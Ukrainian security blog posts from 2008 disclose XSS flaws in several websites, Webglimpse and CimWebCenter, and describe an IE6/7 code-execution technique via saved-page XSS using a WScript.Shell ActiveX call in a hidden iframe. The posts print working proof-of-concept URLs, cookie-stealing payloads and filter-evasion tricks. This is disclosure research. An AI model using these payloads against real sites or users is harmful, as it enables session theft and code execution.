Websecurity - Веб безпека

12.05.2008

У жовтні, 18.10.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.videoradar.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

21.11.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена. Але виправлена неякісно, тому при невеликій зміні коду уразливість знову працює.

XSS:

• alert(document.cookie) (IE)
• цікавий (IE)

В минулому і цьому році я знайшов Cross-Site Scripting уразливості в різних браузерах (IE, Chrome і Opera), що відносяться до типу Saved XSS. Про дані XSS я писав раніше, зокрема в проекті День багів в браузерах 2. І нещодавно, 14.11.2008, я розробив методику проведення Code Execution атаки через дані XSS уразливості.

Зараз розповім про Code Execution атаку через Cross-Site Scripting уразливість в Internet Explorer.

Атака працює при збереженні в IE веб сторінки на комп’ютер користувача і наступному її відкритті в IE. Дана методика може використовуватися для обходу різних проксі й фаєрволів, що аналізують зміст веб сторінок на предмет шкідливого коду (тому що атакуючий код з’являється в сторінці вже після збереження). А також може використовуватися для обходу антивірусів.

Code Execution:

http://site/?--><script>c=new/**/ActiveXObject('WScript.Shell');c.Run('calc.exe');</script>

Символи коментарю “/**/” потрібні, щоб обійти обмеження IE на пробіли, який замінює їх в URL на %20 і не конвертує назад при збереженні сторінки. Зате він робить це при використанні iframe в коді сторінки, тому в цьому випадку коментарі не потрібні.

Для проведення прихованої атаки можна використати iframe:

<iframe src="http://site/?--><script>c=new ActiveXObject('WScript.Shell');c.Run('calc.exe');</script>" height="0" width="0"></iframe>

Дана атака працює в Internet Explorer коли ввімкнена (Enabled чи Prompt) опція “Initialize and script ActiveX control not marked as safe” (для Local intranet). Це такий баг в дірці Microsoft і це метод обходу багу. Дане налаштування потрібне лише при атаці через цю XSS, коли JS код знаходиться на тому ж рядку, де і коментар. Бо коли на іншому рядку (тобто без передуючого коментарю), то код спрацьовує і без цієї опції (Disable). Що може бути досягнуто у випадку, якщо атака проводиться не через XSS, а безпесередньо в тілі сторінки розміщений (відповідним чином) атакуючий код.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) і попередні версії. Та Internet Explorer 7 (7.0.6000.16711) і попередні версії.

В даній добірці уразливості в веб додатках:

• Oracle 11g/10g Installation Vulnerability (деталі)
• Oracle 0-day to get SYSDBA access (деталі)
• IceBB 1.0rc6 <= Remote SQL Injection (деталі)
• IceBB 1.0rc6 <= Remote SQL Injection (деталі)
• VigileCMS 1.4 Multiple Remote Vulnerabilities (деталі)
• FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection (деталі)
• VU Case Manager “Username/Password” SQL Injection (деталі)
• VU Mailer (Mass Mail) “Password” SQL Injection (деталі)
• Updated phpMyAdmin packages fix multiple vulnerabilities (деталі)
• MySpace Scripts - Poll Creator JavaScript Injection Vulnerability (деталі)

Сьогодні, після попередніх уразливостей Webglimpse, я знайшов нові Cross-Site Scripting уразливості в локальній пошуковій системі Webglimpse. Дірки виявив на офіційному сайті системи http://webglimpse.net. Про що найближчим часом сповіщу розробників системи.

XSS (IE):

Уразливості в webglimpse.cgi в параметрах case, whole, lines, errors, age, filter і wordspan.

http://site/cgibin/webglimpse.cgi?ID=1&query=12345&case=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&whole=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&lines=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&errors=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&age=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&filter=%22style%3D%22background-image:url(vbscript:eval(chr(97)%2Bchr(108)%2Bchr(101)%2Bchr(114)%2Bchr(116)%2Bchr(40)%2Bchr(100)%2Bchr(111)%2Bchr(99)%2Bchr(117)%2Bchr(109)%2Bchr(101)%2Bchr(110)%2Bchr(116)%2Bchr(46)%2Bchr(99)%2Bchr(111)%2Bchr(111)%2Bchr(107)%2Bchr(105)%2Bchr(101)%2Bchr(41)))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&wordspan=%22style%3D%22xss:expression(alert(document.cookie))

Уразливі Webglimpse 2.18.7 та попередні версії.

13.05.2008

У жовтні, 18.10.2007, я знайшов Cross-Site Scripting уразливість на проекті http://board.i.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів i.ua я писав про уразливість на blog.i.ua.

Детальна інформація про уразливість з’явиться пізніше.

19.11.2008

XSS:

XSS в DOM при кліку на “aвторизироваться”.

• alert(document.cookie)

Дана уразливість вже виправлена.

В даній добірці уразливості в веб додатках:

• Sciurus Hosting Panel Code Injection (деталі)
• Ruby on Rails: Multiple vulnerabilities (деталі)
• WBR3404TX Broadband Router XSS (деталі)
• Sciurus Hosting Panel Code Injection (деталі)
• Myspace Clone Script (index.php) Remote File Inclusion Vulnerability (деталі)
• Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability (деталі)
• net-finity (links.php) Remote SQL Injection Vulnerability (деталі)
• JiRos Upload Manager SQL Injection (деталі)
• ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection (деталі)
• Persistent XSS on Aruba 800 Mobility Controller’s login page (деталі)

Сьогодні я знайшов Cross-Site Scripting уразливості в Webglimpse. Це локальна пошукова система. Дірки виявив на офіційному сайті системи http://webglimpse.net. Про що найближчим часом сповіщу розробників системи.

XSS (IE):

Уразливості в webglimpse.cgi в параметрах autosyntax і autonegate.

http://site/webglimpse.cgi?ID=1&query=12345&autosyntax=%22style%3D%22xss:expression(alert(document.cookie))

http://site/webglimpse.cgi?ID=1&query=12345&autonegate=%22style%3D%22xss:expression(alert(document.cookie))

Уразливі Webglimpse 2.18.7 та попередні версії.

10.05.2008

У жовтні, 15.10.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://mylivepage.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

17.11.2008

XSS:

• alert(document.cookie)

Insufficient Anti-automation:

Уразливість була в капчі на сторінці http://en.mylivepage.com /register/index (зараз http://en.mylivepage.com/signup/). Що була вразлива до MustLive CAPTCHA bypass method. Цю капчу замінили на нову.

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• Konqueror Remote Denial Of Service (деталі)
• 0day0day0day0day AURACMS XSS!! LATEST VERSION!!! 0day0day0day0day (деталі)
• WebEx GPCContainer Memory Access Violation (деталі)
• ExoPHPdesk user profile XSS / profile SQL injection (деталі)
• VTLS.web.gateway cgi is vulnerable to XSS (деталі)
• AutoIndex <= 2.2.2 Cross Site Scripting and Denial of Service (деталі)
• CA Host-Based Intrusion Prevention System (CA HIPS) Server Vulnerability (деталі)
• Javamail login username and password same email problem (деталі)
• XSS on Liferay Portal Enterprise 4.1.1 login page (’login’ parameter) (деталі)
• Aida-Web Information Exposure (деталі)

Ще 26.06.2006, після того як я знайшов попередні уразливості в CimWebCenter, я знайшов нові Cross-Site Scripting уразливості в системі CimWebCenter. Одну з дірок виявив на офіційному сайті системи http://cimwebcenter.com, а також перевірив її та знайшов іншу дірку ще на двох сайтах на даній CMS.

XSS:

http://site/forum/?qrstr=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/feeds?qrstr=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі CimWebCenter 4.0 та попередні версії.